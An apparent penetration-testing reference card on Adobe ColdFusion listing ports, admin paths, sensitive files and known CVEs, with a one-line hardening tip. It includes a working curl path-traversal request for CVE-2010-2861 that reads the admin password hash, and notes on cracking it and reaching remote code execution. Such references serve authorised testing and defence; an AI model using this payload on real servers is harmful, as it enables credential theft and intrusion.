Adobe ColdFusion
aka CFML, CFIDE
Java web app platform on 8500. A directory-traversal CVE leaks the admin hash, and deserialization / unauthenticated upload CVEs give RCE; the admin panel lives at /CFIDE.
Ports
| Port | Proto | Notes |
|---|---|---|
8500 | tcp | ColdFusion built-in web server |
80 | tcp | HTTP (when fronted by IIS/Apache) |
Fingerprint
- /CFIDE/administrator/index.cfm admin login
- .cfm extension and ColdFusion error pages reveal the version
Key files
| Path | Holds | Sensitive |
|---|---|---|
password.properties | the admin password hash | sensitive |
CFIDE/ | admin interface and component browser |
Default / weak creds
admin (hash recoverable via CVE-2010-2861)
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2010-2861 | Directory traversal / LFI to read password.properties (admin hash) |
| CVE-2017-3066 | Java deserialization RCE |
| CVE-2018-15961 | Unauthenticated file upload RCE |
Exploitation primitives
- CVE-2010-2861: traverse to read password.properties, then crack/replay the admin hash
- CVE-2017-3066 deserialization and CVE-2018-15961 unauth upload for direct RCE
- As admin: scheduled tasks and the component browser run code
Overview
ColdFusion runs CFML apps on a JVM, usually on 8500. It has a long history of high-impact CVEs, from an LFI that leaks the admin hash to unauthenticated upload RCE.
Enumeration
curl -s http://<TARGET>:8500/CFIDE/administrator/index.cfm | grep -i version
# CVE-2010-2861 hash read:
curl --path-as-is "http://<TARGET>:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"Hardening
Patch to a current release, restrict /CFIDE access, and change the admin password.